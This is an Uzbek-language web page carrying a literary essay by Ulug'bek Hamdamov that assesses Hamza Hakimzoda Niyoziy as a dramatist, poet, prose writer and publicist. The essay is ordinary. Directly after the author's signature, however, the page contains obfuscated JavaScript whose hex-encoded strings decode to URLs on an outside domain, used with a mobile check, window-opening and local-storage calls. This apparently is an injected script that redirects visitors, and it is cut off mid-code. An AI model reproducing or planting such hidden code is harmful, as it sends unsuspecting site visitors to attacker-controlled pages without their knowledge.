Payshanba, 12-noyabr, 2026 Toshkent +1° USD 11 964,27 EUR 13 323,41 RUB 144,49

Hamza Hakimzoda haqida nimalarni bilamiz?

Hamzalar yashagan davr gʻoyat murakkab boʻlgan. Shu bois, ular haqida soʻz aytar ekanmiz, davrni hisobga olib, davr kontekstida aytaylik. Bugungi kunning imkonlaridan kelib chiqib soʻz aytmaylik – zulm qilib qoʻyamiz. Albatta,…

Hamzalar yashagan davr gʻoyat murakkab boʻlgan. Shu bois, ular haqida soʻz aytar ekanmiz, davrni hisobga olib, davr kontekstida aytaylik. Bugungi kunning imkonlaridan kelib chiqib soʻz aytmaylik – zulm qilib qoʻyamiz.

Albatta, hamzalar ham oʻz yoʻlida ikkilangan, qayerdadir adashgan, lekin eng muhimi, niyatlari ezgu va ulugʻ – millatni yorugʻlikka olib chiqish boʻlgan. Bunga shubha boʻlishi mumkin emas! Mana shu maqsad yoʻlida, masalan, Hamza oʻz yonidan maktablar ochgan, oʻz hisobidan kitobu daftarlar tarqatgan, oʻzi darslik yozgan, sheʼr yozib kuy bastalagan, qoloq yurtning qashshoq va maʼrifatsiz bolalariga taʼlim bergan. Yaʼni bir oʻzi butun boshli bir maktab vazifasini oʻtagan. Bu Hamza va uning avloddoshlari qilgan ishning bittasi, xolos, bittaginasi!

Hamzalar oʻzlari tanlagan yoʻlda molini, umrini, soʻng jonini qurbon qilishganligini ham unutmaylik. (“Millat degan kimsa suymas dunyoni, Mol ila jon ila boʻlur qurboni” Hamza. [II,15].)
Hamza haqida “mukammallik taxti”ga oʻtirib olib soʻz yuritmoqchi boʻlgan odam, avvalo, “men oʻzimdan ortib, boshqalar uchun, jamiyat uchun nima xayrli ish qildim?” deb soʻrab koʻrishi kerak. Ne yoziqki, amallari qolib, “Hamza dindormi, dahriy?” deya tortishib yotibmiz. Hamza bundan qariyb 1 asr burun oʻldirilgan. Uning eʼtiqod masalasini oʻzi va Alloh biladi. Hozirda, bugun boʻlib oʻtgan bir voqeani yuzta odam yuz xil talqin qilib turgan bir vaqtda biz qanday qilib yuz yil oldin oʻlib ketgan bir bandaning iymoniga qozi boʻla olamiz? Kim berdi bizga bunday huquqni?!.. Allohning ishiga aralashib qoʻymayapmizmi?!..

Hamza kabi millat fidoyilarining oʻzidan ortib oʻzgalar uchun nima ishlar qilgani haqida soʻz yuritish – eng foydalisi! Ha, amallar haqida gaplashaylik, iymon ajrimini esa Yaratganga qoldiraylik. Amallarning ham toʻgʻrisini toʻgʻri, notoʻgʻrisini notoʻgʻri deylik, tamom-vassalom. Kelajak shundan yutadi agar yutsa…

HAMZA VA YaNGI OʻZBEK ADABIYoTI

Yangi adabiyot asoschilaridan biri boʻlish uchun ijodkorga isteʼdodli boʻlib tugʻilishning oʻzi kamlik qiladi. Buning uchun u ijodkor sifatida omadli ham boʻlishi shart. Yaʼni uning isteʼdodi bilan davr ehtiyojlari bir-biriga muvofiq tushmogʻi kerak. Xuddi Dante, Navoiy, Pushkin zimasiga tushgan omadli qismat yangligʻ. Shu maʼnoda Hamza toleʼi kulgan ijodkor. U Behbudiy, Fitrat, Qodiriy va Choʻlpon bilan birga yangi oʻzbek adabiyoti tamal toshini qoʻygan ijodkorlardan biridir. Nomlari zikr etilgan ulugʻlarimiz butun bir millat oldiga davr yuklagan ulkan, kechiktirilmas muammolarni, avvalo, toʻgʻri idrok etganlar, soʻngra asosiylarini muvaffaqiyatli hal etganlar. Shunisi bilan ularning barchasi ijodkor sifatida juda ham omadlidirlar.

Oʻzbek adabiyoti keyingi 500 yil mobaynida chinakamiga ikki tub burilishni boshidan kechirdi. Birinchisi, Navoiy va Bobur davri oʻzbek (turkiy) adabiyot bilan bogʻliq boʻlsa, ikkinchisi, hech shubhasiz, jadidlar davri adabiyoti bilan bogʻliq burilishdir. Ehtimol, Behbudiy, Hamza, Fitrat, Qodiriy va Choʻlponlarga nasib qilgan isteʼdod kuchi Navoiy va Boburning dahosi bilan boʻylasha olmas, lekin ularning madaniyat, maʼnaviyat, adabiyot, sanʼat va ilm sohasida amalga oshirgan ishlari buyuk salaflar xizmatidan aslo kam emas. Zero, jadid bobolarimiz oʻz zimmalariga davr yuklagan missiyani juda yuksak darajada ado etganlar. Behbudiy asosan mafkurada, Hamza dramada, Fitrat ilmda, Qodiriy nasrda, Choʻlpon esa sheʼriyatda ana shu ulugʻ vazifani bekamu koʻst bajarganlar. Akademik Naim Karimov yozadi: “XX asr boshlarida tugʻilgan va shakllangan jadid adabiyoti oʻz oldiga yangi adabiy badiiy vazifa qoʻydi va vazifani oʻtash jarayonida shu vaqtga qadar adabiyotimiz xazinasida boʻlmagan yangi adabiy tur va janrlar, tasvir vasitalari va usularining yuzaga kelishini taqozo etdi”. Binobarin, bugungi, zamonaviy oʻzbek adabiyoti aynan keyingi yangilanish yoʻlidan, jadidlar boshlab bergan qutlugʻ yoʻldan rivojlanib borayotganligining oʻziyoq adabiyotimizda yuz bergan soʻnggi tub burilishning naqadar ahamiyatli ekanini koʻrsatadi. XX va XXI asr mobaynida adabiyotimizning deyarli barcha sohalarida yuz bergan asosiy oʻzgarishlar, yangilanishlar ana shu ikkinchi tub burilish maydonida sodir boʻldi va boʻlmoqda, desak, ayni haqiqatni aytgan boʻlamiz. Chunki tub burilish boʻlishi uchun istakning va hatto isteʼdodning oʻzi yetmaydi. Buning uchun davrning qoʻynida yangilanish ehtiyoji paydo boʻlishi kerak. Behbudiy, Hamza, Fitrat, Qodiriy va Choʻlponlar ana shunday ehtiyoj tugʻilgan paytda dunyoga keldilar. Garchand ularning shaxsiy qismatlari fojeali yakun topgan esa-da, (birontasi oʻz ajali bilan oʻlmagan, aksincha, yangi oʻzbek adabiyoti yoʻlboshlovchilarining hammasi ayni ijodlari gullagan vaqtda qatagʻon qilingan!) nomlari zikr etilgan ulugʻlar ijodkor sifatida chindan-da baxtlidirlar.

Hamza – serqirra ijodkor. Umuman, serqirralik jadid ijodkorlarining aksariga xos. Hamza – ulugʻ dramaturg, Hamza – anʼana va novatorlikni birlashtirgan shoir, Hamza – boshlovchi nosir, Hamza – oʻtkir publitsist, Hamza – mohir pedagog, Hamza – milliy kompozitor, Hamza – otashin notiq, Hamza – rejissyor, Hamza – teatr arbobi… Bulardan tashqari, xalqimizning bu fidoyi oʻgʻloni yurtning kelajagi – maʼrifat, maorif, adabiyot, taʼlim-tarbiya yoʻlida amalga oshirgan ishlarining salmogʻi juda ogʻir tosh bosadi. Bu qutlugʻ yoʻlda Hamza molini ham, jonini ham ayamagan. Bu gaplar shunchaki chiroyli gaplar emas. Hamza va u kabi oʻnlab ulugʻ jadidlarimizning taqdir yoʻllari chindan-da bugungi zamondosh insonni hayratga solishga qodir. Biz ishimizning talabidan kelib chiqib, Hamza ijodiy faoliyatining toʻrt qirrasiga toʻxtalamiz, xolos. Bular Hamzaning drama, sheʼriyat, nasr hamda publitsistika sohalaridagi faoliyatidir. Qoʻlingizdagi toʻplamda Hamzaning mazkur toʻrt adabiy janrda yozgan asarlaridan namunalar berilganki, ularni oʻqib, mulohaza qilish asnosida adibning ham bosib oʻtgan olovli yoʻlini, ham uning adabiyotimiz ravnaqiga qoʻshgan hissasini chamalab koʻrishingiz mumkin boʻladi. Oʻylaymizki, tanlab olingan namunalar Hamzaning, bir paytning oʻzida, ham islohotchi-kurashchi, ham sanʼatkor boʻlganligini anglashga kifoya qiladi.

Hamza dramaturgiyasi. XX asr avvalida ijtimoiy-siyosiy hayotdagi yangilanishlar asrlar davomida Sharq mumtoz adabiyoti anʼanalari ruhida taraqqiy etib kelayotgan oʻzbek adabiyotida dramatik turni paydo qildi. Dramaning tugʻilishi oʻzbek adabiyoti uchun xuddi roman janri kabi yangi hodisa edi. Hamza ana shu hodisaning boshida turdi va oʻz dramatik asarlari bilan oʻzbek dramaturgiyasiga asos soldi. Madomiki, soʻz shu masalaga kelib taqalgan ekan, Hamza va uning oʻzbek dramaturgiyasidagi oʻrni masalasida bahsli qarashlar borligini aytish joiz. Xullas, masala qisqa va loʻnda bayon qilinsa, shunday holga keladi: Mirmuhsin Shermuhamedov (“Befarzand Ochildiboy”, 1914 yil), Hamza (“Yangi saodat yoxud Milliy roman”, 1915) lar roman tajribasiga ilk marta qoʻl urgani holda, biz Qodiriyni oʻzbek romanchiligining asoschisi, deb ataymiz. Chunki Mirmuhsin va Hamza roman janriga Qodiriydan oldin murojaat qilishgan boʻlsa-da, ularning harakatlari bir tajriba, urinish darajasida qolgan edi. Qodiriy esa “bir hamla”da “Oʻtkan kunlar” (1924) bilan roman janrining risoladagi talablariga javob beruvchi yirik nasriy asar yaratgan edi. Shuning uchun ham Qodiriy oʻzbek romanchiligining asoschisi deyiladi. Yoxud Navoiydan oldin Xorazmiy, Lutfiy, Atoiy, Sakkokiylar turkiy tilda ashʼor bitgani bilan bu tildagi ulugʻ xizmatlari tufayli aynan Alisher Navoiyni oʻzbek adabiyoti va adabiy tilining asoschisi deymiz. Adabiyotshunoslik ilmining mana shu baholash mezonini dramaturgiya sohasiga tadbiq qilingudek boʻlsa, qarshimizda quyidagicha manzara qad rostlaydi: garchand Mahmudxoʻja Behbudiy “Padarkush” (1911) nomli hajman juda qisqa pesasi bilan oʻzbek adabiyotida pesa yozib berishni boshlagan boʻlsa-da, dramaturgiyaning butun talablariga javob bera oladigan pesalarni aynan Hamza Hakimzoda Niyoziy (“Zaharli hayot” (1916), “Maysaraning ishi” (1926), “Paranji sirlaridan bir lavha yoki Yallachilar ishi” (1927)) ni yozdi. Bulardan tashqari, “Burungʻi saylovlar”, “Jahon sarmoyasining eng oxirgi kunlari”, “Qozining sirlari”, El quzgʻunlari” kabi 1921 va 1928 yillar orasida yozilgan katta-kichik dramalari mavjud. Bas, shunday ekan, Qodiriy oʻzbek romanchiligi asoschisi degan nomga qanchalik sazovor va haqli boʻlsa, Hamza ham oʻzbek dramaturgiyasi asoschisi degan unvonga shunchalar haqdor va munosib boʻlib koʻrinadi. Albatta, ushbu masala yuzasidan mavjud faktlarni turli yoʻsinda tahlilu talqin etib, bir-biriga qarama-qarshi xulosalarni oʻrtaga tashlash mumkin. Ammo adabiyot ilmining baholash kriteriyalari hamma uchun bir xil boʻlishi adolatdan ekanligidan kelib chiqiladigan boʻlsa, Qodiriyga ravo koʻrilgan adolat mezoni Hamzaga kelganda tavrini oʻzgartirmasligi lozim boʻladi. Albatta, bu jiddiy masalaning boshqa nozik jihatlari ham boʻlishi mumkin. Bunday jihatlar istisno qilinmaydi. Shuning uchun ham soha bilimdonlari ushbu bahstalab masala boʻyicha asosli, ilmiy mushohadalarini qaytadan oʻrtaga tashlashsa, adabiyotshunoslik va dramaturgiya kesishgan nuqtadagi bitta muammoga oydinlik kiritilgan boʻlardi. Nima boʻlganda ham, hali dramaturgiyamizning ham amaliy, ham nazariy sahnasida amalga oshirilishi, hal etilishi kerak juda koʻp ishlar oldimizda turibdi. Bunga, jumladan, Hamzaning drama sohasidagi oʻta salmoqdor ijodi ham manba boʻlib xizmat qiladi.

Hamzaning 1916 va 1920 yillarda yozilgan “Boy ila xizmatchi”, “Loshman fojialari”, “Fargʻona fojialari” kabi asarlari yoʻqolgan. Faqat “Loshman fojialari”ning “Istibdod qurbonlari” degan qismi hamda “Boy ila xizmatchi” dramasining afishasi saqlanib qolgan. Yaqin-yaqinlargacha teatrlarimizda qoʻyilib kelgan “Boy ila xizmatchi” dramasini esa dramaturg Komil Yashin afishada aks etgan mazmun boʻyicha qayta tiklagan.
Hamzaning oʻzbek dramaturgiya sohasidagi faoliyatini qisqacha qilib, u oʻz davri xalq hayotini koʻzguga solib koʻrsatib berishning uddasidan chiqdi, deyish mumkin. Bu esa, barcha zamonlar ijodkorining muqaddas orzusi hisoblanadi. Shuning uchun ham Hamzaning eng sara dramalari hozirgacha sahna yuzidan tushmay kelmoqda.

Hamza publitsistikasi. Hamza har jihatdan simobdek qaynab turgan zamonda yashagan. Hamza kabi oʻnlab jadidlar merosini oʻrganishda, merosga ilmiy jihatdan yondashib, umumlashma xulosalar chiqarishda mana shu omilni doimo nazarda tutmoq kerak. Chunki jadidlar oʻz davrining urib turgan qon tomiriga tashhis bamogʻini qoʻyib, soʻng uni davolashga kirishgan ulugʻ tabiblar edi. Bunga iqror boʻlish uchun Hamzaning 40 yillik qisqa hayoti mobaynida qoldirgan salmoqli merosini, xususan, davr muammolariga bagʻishlangan publitsistikasiga nazar tashlashning oʻzi kifoya. “Bitʼatmi, majusiyatmi?”, “Faqirlik nimadan hosil oʻlur?”, “Maktabi dor ul-aytom”, “Qalbga bilimni(ng) yoʻlini ochaylik”, “Iydi qurbon”, “Juma qandoq kun?”, “Xutbadan murod nima?”, “Mahalliy sarmoyani kuchaytirish choralari”, “Teatr truppasi va ong-bilim qoʻmitasi”, “Millat maʼrifat bilan tirik” kabi oʻnlab publitsisik maqolalari borki, ularning nomlariyoq Hamzaning davr muammolariga qanchalar katta ahamiyat berganini koʻrsatadi. Hamza oʻz maqolarida yurt va xalq kamolini tilaydi, elu yurt rivoji yoʻlida toʻsiq boʻlayotgan har qanday masalaga olovli munosabat bildiradi. Bunday toʻsiqlar ildizi xalq zehniyatida asrlar davomida tanda qoʻygan jaholatga borib taqaladi. Johillik odamlarni asl dindan koʻra bitʼatga, bilim olishga intilishdan koʻra xurofotga, oʻz erkiga ega boʻlib, hur yashashdan koʻra boʻyinturigʻini dindorlar va boylar qoʻliga tutqazib qoʻyib, quldek kun kechirishga yetaklashini ayovsiz tanqid qiladi. Jadidlar harakatining dasturi bilan hamohang ushbu muammolar Hamza merosining ham mundarijasini belgilash bilan birga, uning qadr-qimmatini yanada oshiradi. Biz toʻplamga ajratilgan hajm imkoniyatidan kelib chiqib, Hamza publitsistikasidan ikkitasinigina tanlab oldik. Bular “Millat maʼrifat bilan tirik” hamda “Faqirlik nimadan hosil oʻlur?” deb nomlangan maqolalardir. Maqolalar bilan tanishar ekansiz, yurt va millat qaygʻusi bilan yashagan, nafaqat yashagan, balki bu qaygʻu yoʻlida hayotini tikkan Hamzaning yonib turgan maʼrifatli yuragini his qilasiz, tushunasiz, hayratlanasiz. Chunonchi, uning “Millat maʼrifat bilan tirik” degan maqolasidan olingan ushbu parchada millatning nega bunday zabun holga tushib qolgani sabablarini koʻrsatadi: “Har millatning aholisi bir atong bolasi kabi oʻlur. Demak, xususan bizim islom millatining bir-birlariga birodarliklari Qurʼoni karimda “Innamo al-moʻʼminina ahvatu faslihu bin ahviqum” oyati bila taklif qilingondir. Mana birodarlar orasindagʻi bugʻz, nifoq, kiyn, adovat, borliq, yoʻqlik, ochlik, toʻqlik, shodlik, gʻamlik kabi turlik-turlik parishonliklarni nadan ekanligʻini imtiyoz qila olursizmi? Yoki xudoyi taolloni irodasi debgina qoʻyasizmi? Boqing yahudiy, armanilarga! Bularni ham bu qadar davlat va taraqqiylarga molik oʻlmoqlari ham xudoyi taolloni irodasimi? Yoʻq, janobi haq oʻziga eng eʼtibor sanalgan islom millatini boshqa millatlardan bu qadar tuban darajadagi gʻaddorliklarga qoldirmas! Janobi haqning zolimlik sifatlardan pok va manzaraligi har bir ne basorat ununda oy va quyoshdan ravshandir. Hushyor boʻlungiz! Anglangiz! Tinglangiz! Borigina bizim millatning bu qadar ogʻir hollar va kamchiliklarga qolgʻoniga eng birinchi modda va illat nima, deb eshitgon tovushga tuqsiz maʼdan va mahvani islom ochiqchi oʻlgon ilk va maʼrifatni qoʻlimizdan yoʻqotganimizdir, demoqdan boshqa chora va javob yoʻqdir” .

Hamzaning “Faqirlik nimadan hosil oʻlur?” degan maqolasida koʻtarilgan masala ham yuqoridagi qarashlarning davomidek jaranglaydi va chuqurroq oʻylab koʻrilsa, maqola hatto bugungi kunda ham oʻz dolzarbligiyu ahamiyatini yoʻqotmaganligiga guvoh boʻlamiz.

Hamza nasri. Davr kayfiyatini aks etirar ekan, Hamza zamon ehtiyojidan kelib chiqib nasrga ham murojaat qildi. Nasriy turda uning ikki asari saqlanib qolgan. “Yangi saodat” va “Uchrashuv”. Ularni Hamza “milliy roman”lar deb ataydi. Albatta, bu asarlar roman janrining talablariga toʻla javob bera olmas edi. Lekin aytish joizki, romanning barcha talablariga toʻla javob bera oladigan “Oʻtkan kunlar”ning (Abdulla Qodiriy) yaratilishi uchun oʻzbek adabiyoti mana shunday tajribalarni boshidan kechirishi kerak edi. Hamza “roman”lari Mirmuhsinning “Bafarzand Ochildiboy” asari bilan birga ana shunday “eksperiment” vazifasini oʻtadi va endilikda biz bu asarlarni sira ikkilanmasdan oʻzbek romanchiligi maktabining dastlabki urinishlari, deya olamiz. Hamza “Yangi saodat” deb nomlangan “milliy roman”i boshlanmasida shunday soʻzlarni yozadi: “Bizim Turkistonda musulmon eru xotunlarimizni yigirma yoshdan yuqorida boʻlub oʻqugonlarini aksari emas, balki hammalari deyarlik eski maktablarda eski imlo va usulda xat va savodlari chiqqan uchun hozirgi matbuotda yangi usul, yangi imlo bila yozulub bosilub chiqub turgan maktab kitoblariga, jarida va risolalarga tezdan tushuna qolub oʻqiy olmaganlari har birimizga ravshandur. Bu risola esa maktabga maxsus oʻlmay, balki qora xalqimizni eru xotunlari orasida oʻqulub turgan “Jamshid”, “Zarqum”, “Aldarkoʻsa”, “Bayoz”, “Dalli Muxtor”, “Gulandom”, “Afandi” kabi butun xurofot va axloqni buzadirgan asossiz kitoblar oʻrnigʻa istifodalik bir qiroat risolasi boʻlurmikin, degan xayol bila yozilgan uchun alarni uqub tushunmoqlariga shoyad oson boʻlur edi, deb butun eski imlo va eski usulda tartib berildi hamda soddaroq yozildi. Baʼzi yangi matbuot oshnolari boʻlgʻon fikrdosh, millatdosh sohib al-tahrir va al-qalam qoriinlarimizdan bu risolamni imlo va tahriridagi kelishmagan bir xil joylarin aybga sanamay, tarahhum uzxasidan afu qilmoq barobarida lutf-shafqat uzasidan xususiy maktub ila ogoh qilmoqlarin oʻtinaman. Chunki bu risolani ikkinchi tabʼilarida yoxud qoʻlimda yozilub turgan va yozilgan risolalarimni nuqssiz oʻlmogʻigʻa shoyad sabab oʻlur edilar (al insonu mushtaqan min al nisyon)” .
Eʼtibor berilsa, Hamzaning bu izohi A. Qodiriyning “Oʻtkan kunlar” soʻzboshisi mazmuniga juda ham hamohangdir. Toʻgʻrirogʻi, Qodiriyning fikri Hamzaning fikriga muvofiq jaranglaydi. Chunki Hamza “milliy roman”ini Qodiriydan qariyb 10 yil muqaddam yozgan edi. Qodiriy esa: “Modomiki, biz yangi davrga oyoq qoʻydik, bas, biz har bir yoʻsinda ham shu yangi davrning yangiliklari ketidan ergashishimiz va shunga oʻxshash dostonchilik, roʻmonchilik va hikoyachiliklarda ham yangarishga, xalqimizning shu zamonning “Tohir Zuhra”lari, “Chor darvesh”lari, “Farhod Shirin” va “Bahromgoʻr”lari bilan tanishtirishga oʻzimizda majburiyat his etamiz” deydi. Demak, har ikki adib ham davrning yangilanganligi tufayli shu davrga mos asarlar bitishni oʻz oldilari turgan vazifa bilib qalam tebratmoqda.
Bulardan tashqari, Hamzaning yana “Haqiqat nima?” degan asar yozganligi, lekin qoʻlyozma nashr boʻlmay yoʻqolgani haqida maʼlumot bor. Chunonchi, “Shoirimiz Hamza Hakimzodaning qisqacha tarjimai holi”da “Haqiqit nima?” degan bir zoʻr asar yozgʻon boʻlsada, tabʼ ettira olmay yoʻqotgʻon” degan maʼlumot keladi. Bu haqda Hamzaning oʻzi “Tarjimoi hol”ida “…eski podsholar turmushidan bir “Haqiqat kimda?” ismli havosiz operalik roman yozgʻan edim, oʻgʻurlatdim, bugunki, topilmaydir” deb yozadi. Chunki zamon gʻoyat algʻov-algʻovli edi. Hamzanig oʻzi ham goh maktab ochaman deb, goh xalq maʼrifati yoʻlida xizmat qilaman deb, goh teatr tashkil etaman deb doimo safarlarda yurgan, hayotning qaynoq quchogʻida oqimga qarshi xoʻp suzgan. Binobarin, jadid ijodkorning oʻziga yarasha doʻst-dushmani koʻp boʻlgan. Boz ustiga, “Hindiston, Makka, Madina, Shom, Beyrut bilan sayohat qilib, Stambulgʻa oʻqishgʻa kelgan boʻlsam ham…” degan eʼtiroflaridan Hamzaning bir qancha xorijiy mamlakatlarni kezib kelgani ham maʼlum boʻladi. Bunday talotoʻp va sayohatlarning ichida, tarafdor va raqiblarning davrasida oʻsha asarning yoʻqolgani haqidagi maʼlumot kishida shubha uygʻotmaydi.

Hamza sheʼriyati. Jadidlar sheʼriyatining yalovbardori Choʻlpon esada, Hamzaning tarjimai holi aynan sheʼriyatida koʻproq namoyon boʻlgan, deyish mumkin. Chunki sheʼr – mobil janr. Unda shoir imkon topdi deguncha qisqa vaqt ichida oʻz his-tuygʻlaridan tortib, ijtimoiy, siyosiy, mafkuraviy, maʼrifiy gʻoyalarini birin-sirin qozozga tushirib qoʻyavergan. Chop-choplarning orasida aksar hollarda sheʼrlarni qayta ishlash imkoni boʻlmaganidan mazmun va shakl mutanosibligi jihatidan qiyomiga yetmagan mashqlar koʻplab uchraydi. Qatʼi nazar, Hamza sheʼrlari uning bosib oʻtgan yoʻllaridan guvohlik berib turadi.
XX yuzyillik ibtidosida millatning tafakkur gullari maʼrifatsizlikni yurtning eng ogʻriq nuqtalaridan biri deb bildilar. Shuning uchun ham ular isteʼdodlarini elni oʻqimishli qilishga bagʻishladilar, bu yoʻlda vaqtlari, kuchlari, mablagʻlari va hatto jonlarini ham ayamadilar. Ular xalqning maʼrifatli boʻlishini yurt ravnaqi va millat taraqqiysining asosi, deb bildilar. Oqibat – adabiyotda maʼrifatli kishi obrazi paydo boʻldi. Avloniy, Soʻfizoda, Ibrat, Hamza, Fitrat, Choʻlpon kabi qator shoirlarning ijodida shu gʻoya qayta-qayta ishlandi.
XX asr boshida jamiyat hayotidagi oʻzgarishlarning hammasi tubjoyning oʻz turmush tarzi, diniy eʼtiqodi, madaniyati, dunyoqarashi bilan goʻyo bir qozonda qaynadi. Bu «qaynov» insonning ongigagina emas, balki qalbigacha kirib bordi va uni oʻz taʼsiriga oldi. Xullas, yuraklargacha kirib borgan hodisaning umumiy nomi mafkura – jadidchilik mafkurasi edi. Eng muhimi, asr boshidagi Turkiston sharoitida haqli ravishda ilgʻor sanalgan gʻoyalarni oʻzida jam etgan bu mafkurani xalqning ilgʻor qismi anglangan tarzda, qalb amri bilan tanlab olgandi. Shuning uchun ham asr avvalidanoq adabiyotga gʻoyalar kirib keldi va bu hech erish tuyulmadi. Chunki endi «qanday yashaymiz, qaysi yoʻldan boramiz, kimga, nimaga ergashamiz?..» degan savol va uning javobi haqidagi oʻylar davr kishisi psixikasining ajralmas bir qismiga aylangandi. Ayni sabab adabiyotning (sheʼriyatning) tez surʼatlar bilan mafkuralashib borishiga imkon yaratdi. Chunki sheʼrlarda tobora koʻp va chuqur aks etib borayotgan siyosiy-ijtimoiy kayfiyatu qarashlar kitobxon estetik didiga uygʻun tushdi. Shuning uchun ham Hamza, Choʻlpon, Fitrat, Avloniy va boshqa shoirlar sheʼriyatining asosini ijtimoiy mavzular tashkil etdi.
Jadid sheʼriyatida eng koʻp qalamga olingan mavzulardan yana biri – Turkistonning, millatning mavjud ahvoli mavzusidir. Mavzu talqinidagi umumiy jihatni qisqa qilib, mavjud ijtimoiy voqelikdan qoniqmaslik hissining ustuvorligi, deyish mumkin. Bu mavzudagi sheʼrlarning barida Turkistonning jaholat botqogʻiga botgani, bu ahvolda qoloqlik domida qolib ketishi muqarrarligi taʼkidlanadi va bundayin yashash insonlik shaʼniga nomunosib degan gʻoya oʻtkaziladi:
Bizdek hech millat bormu zillatga botgan,
Safohatga aldanub iffat yoʻqotgan.
Firorinda tik yotur ixvat oʻrgatgan,
Jahlu bidʼat zahrini sharbat koʻrsatgan.

Shuni ham taʼkidlash kerakki, boshqa jadid shoirlari ham yurtdagi tanazzul omillarini, asosan, Hamza koʻrsatgan sabablarda deb biladilar. Bu esa yana ulardagi ijtimoiy maqsad-intilishlarning umumiyligi, ularni birlashtiruvchi gʻoyalar tizimi – jadidchilik mafkurasi boʻlgani bilan izohlanadi.
Millat degan kimsa suymas dunyoni,
Mol ila jon ila boʻlur qurboni” (Hamza)[II,15].
Hamzaning millat uchun dunyoni unutishga daʼvati bejiz emas. Bu Vatan, millat tushunchalari jadid sheʼriyatining idealiga aylangani, mumtoz adabiyotdagi poetik obrazlar yangicha, ijtimoiy mazmun kasb eta boshlaganidan dalolatdir.
Shu oʻrinda bir narsaga alohida eʼtibor qaratishni istardim. Qarashlari Fitratu Choʻlponlardan qancha farqlanmasin, Hamza hech bir sheʼrida kechagi hammaslaklari – jadidlarga muxolif sifatida qaramagan, ularga qarshi fikriy urush ochmagan. Buning sababi, bizningcha, Hamza oʻzining shoʻro safidagi faoliyatini maʼlum maʼnoda jadidchilik foliyatining davomi oʻlaroq tushungani bilan izohlanishi mumkin. Yaʼni Hamzada hamon oʻsha maqsad yoʻlida harakat qilmoqdaman, faqat unga yetish yoʻlini oʻzgartirdim, deb hisoblashga asos bor.
Jadid sheʼriyatida kinoya muhim oʻrin tutadi. Negaki, kinoya narsa-hodisaga odatlanilgandan oʻzgacha – nostandart qarash natijasi boʻlib, oʻquvchi (tinglovchi)ni ham beixtiyor oʻzgacha qarashga majbur etadi. Shuning uchun ham samarali usul sifatida kinoyadan notiqlikda keng foydalaniladi . Maʼlumki, jadidlar xalqimizga xos dabdabali koni isrof toʻy-hashamlarga qarshi boʻlganlar, mashaqqat bilan topilgan mablagʻni joyiga sarflamaslikni qattiq tanqid etganlar. Qoʻllangan usullar bunga oʻzgacha qarashga undaydi. Yaʼni ritorik soʻroq, qarshilantirish va kinoya vositasida xuddi shu qarash muxtasar tarzda, esda qolarlik qilib ifoda etilgan. Hamzaning kinoyalari yanada oʻziga xos, ular achchiqligi, zaharxandaga boyligi bilan farqlanadi:
Boybachchalar semiring, beshni oʻn beshga bering,
Yahudlarni boy qilgʻoch, yotib kesak kemiring.
Oʻqitmang oʻgʻulni, yetar ushbu tijorat. [II,53]
Hamza sheʼriyati xuddi dramalari singari oʻz davrining koʻzgusidir. Shoir oʻzi yashagan gʻoyat murakkab zamonning dolzarb muammolarini sheʼriyati bilan ham hal qilishga kirishib, goh aruzda, goh yangi barmoq vaznida juda samarali qalam tebratdi. Eng muhimi, Hamza soʻz vositasida jamiyatga taʼsir qilish yoʻllarini topdi, xalqi va Vatanining kamoliga soʻz bilan xizmat qildi.

Xulosa sifatida shuni aytish joizki, Hamza Hakimzoda Niyoziy yangi oʻzbek adabiyoti poydevorini qoʻygan zabardast asoschilardan biri va shunday boʻlib qoladi.

Ulugʻbek HAMDAMOV,
filologiya fanlari doktori

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const 